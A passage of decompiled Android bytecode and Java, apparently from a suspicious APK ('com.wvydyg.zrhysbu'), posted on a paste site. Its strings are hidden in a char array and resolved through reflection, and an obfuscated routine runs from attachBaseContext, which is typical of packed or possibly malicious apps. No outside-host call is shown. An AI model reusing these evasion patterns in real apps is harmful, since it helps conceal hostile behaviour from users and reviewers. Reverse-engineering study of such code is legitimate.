  4729.     //   6484: invokevirtual 97 java/lang/Class:getMethod   (Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  4730.     //   6487: aastore
  4731.     //   6488: aload 17
  4732.     //   6490: bipush 11
  4733.     //   6492: aload 18
  4734.     //   6494: bipush 69
  4735.     //   6496: bipush 27
  4736.     //   6498: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4737.     //   6501: invokestatic 81  java/lang/Class:forName (Ljava/lang/String;)Ljava/lang/Class;
  4738.     //   6504: aload 18
  4739.     //   6506: bipush 108
  4740.     //   6508: bipush 13
  4741.     //   6510: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4742.     //   6513: aconst_null
  4743.     //   6514: invokevirtual 97 java/lang/Class:getMethod   (Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  4744.     //   6517: aastore
  4745.     //   6518: aload 18
  4746.     //   6520: bipush 121
  4747.     //   6522: bipush 27
  4748.     //   6524: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4749.     //   6527: invokestatic 81  java/lang/Class:forName (Ljava/lang/String;)Ljava/lang/Class;
  4750.     //   6530: astore 20
  4751.     //   6532: aload 18
  4752.     //   6534: sipush 148
  4753.     //   6537: iconst_3
  4754.     //   6538: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4755.     //   6541: astore 21
  4756.     //   6543: iconst_1
  4757.     //   6544: anewarray 77 java/lang/Class
  4758.     //   6547: astore 22
  4759.     //   6549: aload 22
  4760.     //   6551: iconst_0
  4761.     //   6552: aload 18
  4762.     //   6554: bipush 42
  4763.     //   6556: bipush 16
  4764.     //   6558: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4765.     //   6561: invokestatic 81  java/lang/Class:forName (Ljava/lang/String;)Ljava/lang/Class;
  4766.     //   6564: aastore
  4767.     //   6565: aload 20
  4768.     //   6567: aload 21
  4769.     //   6569: aload 22
  4770.     //   6571: invokevirtual 97 java/lang/Class:getMethod   (Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  4771.     //   6574: astore 23
  4772.     //   6576: iconst_1
  4773.     //   6577: anewarray 99 java/lang/Object
  4774.     //   6580: astore 24
  4775.     //   6582: aload 24
  4776.     //   6584: iconst_0
  4777.     //   6585: aload 18
  4778.     //   6587: sipush 151
  4779.     //   6590: bipush 25
  4780.     //   6592: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4781.     //   6595: aastore
  4782.     //   6596: aload 23
  4783.     //   6598: aconst_null
  4784.     //   6599: aload 24
  4785.     //   6601: invokevirtual 30 java/lang/reflect/Method:invoke (Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  4786.     //   6604: checkcast 50 java/lang/String
  4787.     //   6607: astore 25
  4788.     //   6609: aload 25
  4789.     //   6611: ifnull +60 -> 6671
  4790.     //   6614: aload 25
  4791.     //   6616: invokevirtual 53 java/lang/String:hashCode   ()I
  4792.     //   6619: ldc_w 557
  4793.     //   6622: if_icmpne +49 -> 6671
  4794.     //   6625: iconst_4
  4795.     //   6626: istore 26
  4796.     //   6628: aload 17
  4797.     //   6630: bipush 12
  4798.     //   6632: iload 26
  4799.     //   6634: invokestatic 105 java/lang/Integer:valueOf   (I)Ljava/lang/Integer;
  4800.     //   6637: aastore
  4801.     //   6638: aload 17
  4802.     //   6640: putstatic 21 com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  4803.     //   6643: return
  4804.     //   6644: astore 41
  4805.     //   6646: iconst_2
  4806.     //   6647: istore 9
  4807.     //   6649: goto -6552 -> 97
  4808.     //   6652: astore 33
  4809.     //   6654: iload 27
  4810.     //   6656: istore 15
  4811.     //   6658: goto -2184 -> 4474
  4812.     //   6661: astore 36
  4813.     //   6663: goto -2169 -> 4494
  4814.     //   6666: astore 37
  4815.     //   6668: goto -2484 -> 4184
  4816.     //   6671: iconst_5
  4817.     //   6672: istore 26
  4818.     //   6674: goto -46 -> 6628
  4819.     //   6677: iconst_0
  4820.     //   6678: istore 40
  4821.     //   6680: goto -6503 -> 177
  4822.     //   6683: iconst_1
  4823.     //   6684: istore 42
  4824.     //   6686: iconst_0
  4825.     //   6687: istore 43
  4826.     //   6689: goto -6392 -> 297
  4827.     //
  4828.     // Exception table:
  4829.     //   from   to  target  type
  4830.     //   4192   4327    4727    java/lang/Throwable
  4831.     //   121    311 6644    java/lang/Exception
  4832.     //   4897   4969    6652    java/lang/Exception
  4833.     //   4522   4577    6661    java/lang/Exception
  4834.     //   4192   4327    6666    java/lang/Exception
  4835.   }
  4836.  
  4837.   private static final int onCreate(int paramInt1, int paramInt2)
  4838.   {
  4839.     (paramInt2 + paramInt1 >> 24);
  4840.     return paramInt1 >>> paramInt2 | paramInt1 << -paramInt2;
  4841.   }
  4842.  
  4843.   protected void attachBaseContext(Context paramContext)
  4844.   {
  4845.     super.attachBaseContext(paramContext);
  4846.     dcff();
  4847.   }
  4848. }
  4849.  
  4850. /* Location:           C:\Android\APKmanager_5.1\projects\com.wvydyg.zrhysbu-1.apk\classes_dex2jar.jar
  4851.  * Qualified Name:     com.wvydyg.zrhysbu.Application
  4852.  * JD-Core Version:    0.6.2
  4853.  */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement